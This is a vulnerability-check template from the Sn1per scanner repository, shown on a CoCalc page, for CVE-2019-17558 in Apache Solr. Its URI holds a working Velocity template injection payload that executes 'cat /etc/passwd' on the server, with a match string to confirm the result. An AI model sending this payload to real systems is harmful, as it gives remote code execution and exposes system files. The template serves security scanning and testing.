Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
1N3
GitHub Repository: 1N3/Sn1per
 Path: blob/master/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
2969 views
1
AUTHOR='@xer0dayz'

2
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'

3
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'

4
METHOD='GET'

5
MATCH="root:*:"

6
SEVERITY='P1 - CRITICAL'

7
CURL_OPTS="--user-agent '' -s -L --insecure"

8
SECONDARY_COMMANDS=''

9
GREP_OPTIONS='-i'

10